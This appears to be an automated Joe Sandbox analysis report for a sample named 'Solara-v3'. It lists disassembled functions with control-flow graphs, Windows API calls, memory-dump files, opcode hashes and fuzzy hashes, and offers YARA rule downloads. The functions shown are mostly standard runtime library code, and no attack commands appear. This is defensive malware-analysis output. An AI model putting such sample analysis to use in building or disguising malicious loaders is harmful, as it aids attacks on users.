                                                                                                                                                                                                                                              • Instruction ID: b14a5c59f468ddd3f19eddd5ecbd37838070bdc5bb7a8d7dcf1ea6b8bbe56192
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0dab722603f7f490684830244e17ffe6a5ca9464f16dd55408b1a6e103aa45d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 862176F2D40215ABDF10EFD49D0AB9EBAB4BF04710F080169F51876291E7B59A14CBE6
                                                                                                                                                                                                                                              Function 00CACF0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 50 cacf0b-cacf17 51 cacfa9-cacfac 50->51 52 cacf1c-cacf2d 51->52 53 cacfb2 51->53 55 cacf3a-cacf53 LoadLibraryExW 52->55 56 cacf2f-cacf32 52->56 54 cacfb4-cacfb8 53->54 59 cacfb9-cacfc9 55->59 60 cacf55-cacf5e GetLastError 55->60 57 cacf38 56->57 58 cacfd2-cacfd4 56->58 62 cacfa6 57->62 58->54 59->58 61 cacfcb-cacfcc FreeLibrary 59->61 63 cacf60-cacf72 call cb0554 60->63 64 cacf97-cacfa4 60->64 61->58 62->51 63->64 67 cacf74-cacf86 call cb0554 63->67 64->62 67->64 70 cacf88-cacf95 LoadLibraryExW 67->70 70->59 70->64
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,3F29B6ED,?,00CAD01A,?,?,00000000), ref: 00CACFCC
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                              • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                              • Opcode ID: 2790d3a78368be15c2a3f4c40c4ef0f4a43a5e4e57c4a5dcf967c2165d1e5c8c
                                                                                                                                                                                                                                              • Instruction ID: 53d84e4c08df3216ab2efc087667f7002da748d55771617ac851ba7751b2f167
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2790d3a78368be15c2a3f4c40c4ef0f4a43a5e4e57c4a5dcf967c2165d1e5c8c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F21E731A01312EFC7319BE5DC81F6E7769DB56768F250161F926A7290DB30EE00C6D0
                                                                                                                                                                                                                                              Function 00C91750 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 390COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 126 c91750-c917eb call ca9c30 129 c917ed-c91803 126->129 130 c91806-c9180b 126->130 129->130 131 c9181b-c91821 130->131 132 c9180d-c91816 130->132 134 c91851-c91855 131->134 135 c91823-c91825 131->135 133 c91b69-c91b8c 132->133 139 c91b8e-c91b95 call c9d748 133->139 140 c91be4-c91c48 call c92f00 call c932c0 call ca060c 133->140 138 c91858-c91898 call c94460 134->138 135->134 137 c91827-c91849 call c92c50 135->137 137->133 149 c9184f 137->149 163 c918ca-c918e0 138->163 164 c9189a-c918b4 138->164 151 c91b9f-c91bad 139->151 152 c91b97-c91b9a call c938e0 139->152 140->133 149->138 153 c91baf-c91bce 151->153 154 c91bd1-c91be3 151->154 152->151 153->154 166 c919b9 163->166 167 c918e6-c918f5 163->167 164->163 178 c918b6-c918c6 164->178 169 c919bb-c919c1 166->169 167->169 170 c918fb 167->170 171 c919ff-c91a03 169->171 172 c91900-c91914 170->172 176 c91a09-c91a11 171->176 177 c91a92-c91a96 171->177 174 c91940-c91965 172->174 175 c91916-c9191d 172->175 185 c91968-c91972 174->185 175->174 181 c9191f-c9192f 175->181 176->177 182 c91a13-c91a59 176->182 179 c91a9c-c91aa6 177->179 180 c91b54-c91b61 177->180 178->163 179->180 184 c91aac 179->184 180->133 181->185 201 c91a68-c91a89 call c9def0 182->201 202 c91a5b-c91a62 182->202 190 c91ab0-c91ac4 184->190 187 c919aa-c919b2 185->187 188 c91974-c91992 185->188 193 c919b5-c919b7 187->193 188->172 192 c91998-c919a8 188->192 194 c91af0-c91b1c 190->194 195 c91ac6-c91acd 190->195 192->193 193->169 198 c91b1e-c91b47 194->198 203 c91b4f 194->203 195->194 197 c91acf-c91ae3 195->197 197->198 199 c91ae5 197->199 198->190 205 c91b4d 198->205 199->203 209 c91a8b-c91a8d 201->209 202->201 204 c919d0-c919dd 202->204 203->180 208 c919e0-c919fc 204->208 205->180 208->171 209->208
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strlen
                                                                                                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                              • API String ID: 4218353326-1866435925
                                                                                                                                                                                                                                              • Opcode ID: 31a00ee20472258e0df625af196fa4db0c50ac47032582080b79378e248add9c
                                                                                                                                                                                                                                              • Instruction ID: b9fe75b6089a17dd818b41f35d376e6c35765f103bea6b1e03f2d08101904e2f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31a00ee20472258e0df625af196fa4db0c50ac47032582080b79378e248add9c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DF14D75A006158FCF14CF69C498BADBBF2FF88324F1942A9E815AB391D734AD45CB90
                                                                                                                                                                                                                                              Function 00CA5349 Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 211 ca5349-ca5354 212 ca536a-ca537d call ca53da 211->212 213 ca5356-ca5369 call ca76e4 call ca7dcf 211->213 218 ca53ab 212->218 219 ca537f-ca539c CreateThread 212->219 223 ca53ad-ca53b9 call ca542a 218->223 221 ca53ba-ca53bf 219->221 222 ca539e-ca53aa GetLastError call ca770a 219->222 227 ca53c1-ca53c4 221->227 228 ca53c6-ca53ca 221->228 222->218 227->228 228->223
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00015470,00000000,00000000,00000000), ref: 00CA5392
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00C92513,00000000,00000000), ref: 00CA539E
                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00CA53A5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2744730728-0
                                                                                                                                                                                                                                              • Opcode ID: 34e2bf8d0948406a932e39ecd9f369064cc785e8f79b607908884773f7800355
                                                                                                                                                                                                                                              • Instruction ID: 4df5a496fbfe7e5516c98968a123f41d1137c0c0a4bdc3289e32b2075eaae4c9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34e2bf8d0948406a932e39ecd9f369064cc785e8f79b607908884773f7800355
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6019E7250261AEFCF159FA0DC06AAE3B64FF423A8F008158F801921A0EBB1DA40EB50
                                                                                                                                                                                                                                              Function 00CA54EE Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 231 ca54ee-ca54fb call cac2bb 234 ca553b-ca553e ExitThread 231->234 235 ca54fd-ca5505 231->235 235->234 236 ca5507-ca550b 235->236 237 ca550d call cace1b 236->237 238 ca5512-ca5518 236->238 237->238 240 ca551a-ca551c 238->240 241 ca5525-ca552b 238->241 240->241 242 ca551e-ca551f CloseHandle 240->242 241->234 243 ca552d-ca552f 241->243 242->241 243->234 244 ca5531-ca5535 FreeLibraryAndExitThread 243->244 244->234
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC2BB: GetLastError.KERNEL32(00000000,?,00CA76E9,00CAD306,?,?,00CAC1B7,00000001,00000364,?,00000005,000000FF,?,00CA5495,00CC8E38,0000000C), ref: 00CAC2BF
                                                                                                                                                                                                                                                • Part of subcall function 00CAC2BB: SetLastError.KERNEL32(00000000), ref: 00CAC361
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00CA53D9,?,?,00CA54CE,00000000), ref: 00CA551F
                                                                                                                                                                                                                                              • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00CA53D9,?,?,00CA54CE,00000000), ref: 00CA5535
                                                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 00CA553E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1991824761-0
                                                                                                                                                                                                                                              • Opcode ID: 0671adb0ac7cebc6cf330b6a985761c910e2e18bcb8192f60b8ceb25799caf24
                                                                                                                                                                                                                                              • Instruction ID: 30ef9ed2899e34bfe480b20c9c58d6ee2eca7acddb99edbf40346aaa330cb5af
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0671adb0ac7cebc6cf330b6a985761c910e2e18bcb8192f60b8ceb25799caf24
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78F01271900E076BCB355B75D958B5E7B9AAF02378B18C614F879C71E0DB30DE528750
                                                                                                                                                                                                                                              Function 00CA565F Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000002,?,00CA5721,00CA8396,00CA8396,?,00000002,3F29B6ED,00CA8396,00000002), ref: 00CA5670
                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00CA5721,00CA8396,00CA8396,?,00000002,3F29B6ED,00CA8396,00000002), ref: 00CA5677
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00CA5689
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                                              • Opcode ID: 3a8806e96c74a83d16ed45a578eab1a809c2b2774bdfce2849d1517d66aff311
                                                                                                                                                                                                                                              • Instruction ID: ed9a76530854d274a3ef001bb797dda2ccb56156b44a0b4d0fdda200de2a8e1f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a8806e96c74a83d16ed45a578eab1a809c2b2774bdfce2849d1517d66aff311
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22D09231100609BFCF012F61DE0DE9D3F2AEF45386B448010F9594A272DF32DA52EA84
                                                                                                                                                                                                                                              Function 00CB3BF4 Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 352 cb3bf4-cb3c16 353 cb3e09 352->353 354 cb3c1c-cb3c1e 352->354 355 cb3e0b-cb3e0f 353->355 356 cb3c4a-cb3c6d 354->356 357 cb3c20-cb3c3f call ca7f78 354->357 359 cb3c6f-cb3c71 356->359 360 cb3c73-cb3c79 356->360 365 cb3c42-cb3c45 357->365 359->360 361 cb3c7b-cb3c8c 359->361 360->357 360->361 363 cb3c9f-cb3caf call cb3f21 361->363 364 cb3c8e-cb3c9c call cb29a2 361->364 370 cb3cf8-cb3d0a 363->370 371 cb3cb1-cb3cb7 363->371 364->363 365->355 372 cb3d0c-cb3d12 370->372 373 cb3d61-cb3d81 WriteFile 370->373 374 cb3cb9-cb3cbc 371->374 375 cb3ce0-cb3cf6 call cb3f9e 371->375 379 cb3d4d-cb3d5a call cb43cd 372->379 380 cb3d14-cb3d17 372->380 376 cb3d8c 373->376 377 cb3d83-cb3d89 GetLastError 373->377 381 cb3cbe-cb3cc1 374->381 382 cb3cc7-cb3cd6 call cb4365 374->382 390 cb3cd9-cb3cdb 375->390 384 cb3d8f-cb3d9a 376->384 377->376 397 cb3d5f 379->397 385 cb3d39-cb3d4b call cb4591 380->385 386 cb3d19-cb3d1c 380->386 381->382 387 cb3da1-cb3da4 381->387 382->390 391 cb3d9c-cb3d9f 384->391 392 cb3e04-cb3e07 384->392 402 cb3d34-cb3d37 385->402 393 cb3da7-cb3da9 386->393 394 cb3d22-cb3d2f call cb44a8 386->394 387->393 390->384 391->387 392->355 398 cb3dab-cb3db0 393->398 399 cb3dd7-cb3de3 393->399 394->402 397->402 403 cb3dc9-cb3dd2 call ca7770 398->403 404 cb3db2-cb3dc4 398->404 405 cb3ded-cb3dff 399->405 406 cb3de5-cb3deb 399->406 402->390 403->365 404->365 405->365 406->353 406->405
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CB3F9E: GetConsoleOutputCP.KERNEL32(3F29B6ED,00000000,00000000,?), ref: 00CB4001
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00CA8584,?), ref: 00CB3D79
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00CA8584,?,00CA87C8,00000000,?,00000000,00CA87C8,?,?,?,00CC8FE8,0000002C,00CA86B4,?), ref: 00CB3D83
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2915228174-0
                                                                                                                                                                                                                                              • Opcode ID: ad12c2410a155fef18f838f0f46712125320a4bf814b54c676ccdd3052afcba1
                                                                                                                                                                                                                                              • Instruction ID: 8edbccd3e0c8fe737315e544fd366576c9eaa4cd2ef83f4d9e6ef2e6355506a7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad12c2410a155fef18f838f0f46712125320a4bf814b54c676ccdd3052afcba1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F61BF7190419AAFDF15CFE8C885AEEBFB9AF09304F140259E910A7252D736DB01DBA0
                                                                                                                                                                                                                                              Function 00CB43CD Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 409 cb43cd-cb4422 call ca0050 412 cb4497-cb44a7 call c9a6e1 409->412 413 cb4424 409->413 415 cb442a 413->415 417 cb4430-cb4432 415->417 418 cb444c-cb4471 WriteFile 417->418 419 cb4434-cb4439 417->419 422 cb448f-cb4495 GetLastError 418->422 423 cb4473-cb447e 418->423 420 cb443b-cb4441 419->420 421 cb4442-cb444a 419->421 420->421 421->417 421->418 422->412 423->412 424 cb4480-cb448b 423->424 424->415 425 cb448d 424->425 425->412
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00CB3D5F,00000000,00CA87C8,?,00000000,?,00000000), ref: 00CB4469
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00CB3D5F,00000000,00CA87C8,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00CA8584), ref: 00CB448F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 442123175-0
                                                                                                                                                                                                                                              • Opcode ID: 99acc77ac7bd4f858fda0bcd455944dfdfb947591ea300dc14e356fba890697e
                                                                                                                                                                                                                                              • Instruction ID: 7b4cd0ff4752423a983f446fd371382a4f970ead439cb04b2bd1f9a43f1c4c78
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99acc77ac7bd4f858fda0bcd455944dfdfb947591ea300dc14e356fba890697e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8219F35A002199FCF19CF69DC80BEDB7B9EB48305F2444A9EA46D7212D630EE52CF64
                                                                                                                                                                                                                                              Function 00C990F0 Relevance: 3.1, APIs: 2, Instructions: 73COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 426 c990f0-c99130 call c9efc1 429 c991c7-c991c9 call c9b317 426->429 430 c99136-c9913d 426->430 431 c991ce-c991df call c9b317 429->431 430->431 432 c99143-c99149 430->432 442 c9919f-c991aa 431->442 434 c9914b-c99172 call c9efd2 432->434 435 c99174-c9919a call c9efd2 call c992f0 432->435 444 c991b6-c991c6 434->444 435->442 442->444 445 c991b1 call c9a660 442->445 445->444
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C991C9
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00C991D7
                                                                                                                                                                                                                                                • Part of subcall function 00C9EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00C98E4A,00C9A2F0), ref: 00C9EFE7
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Cpp_errorThrow_std::_$ExclusiveLockRelease
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3666349979-0
                                                                                                                                                                                                                                              • Opcode ID: f807be7d3e9ea2a0db6a6a897e3b82e8c40a534d724c9a9cc79a1326cee26665
                                                                                                                                                                                                                                              • Instruction ID: ca472b611b7f1ea000baa44458d52d511244bdf5eeae8cdbae422d166c630dba
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f807be7d3e9ea2a0db6a6a897e3b82e8c40a534d724c9a9cc79a1326cee26665
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF21D1B1A006469BDF10DFA8D949BAEBBB5FB04320F144229E52967381D734AA15CBD2
                                                                                                                                                                                                                                              Function 00CADA52 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
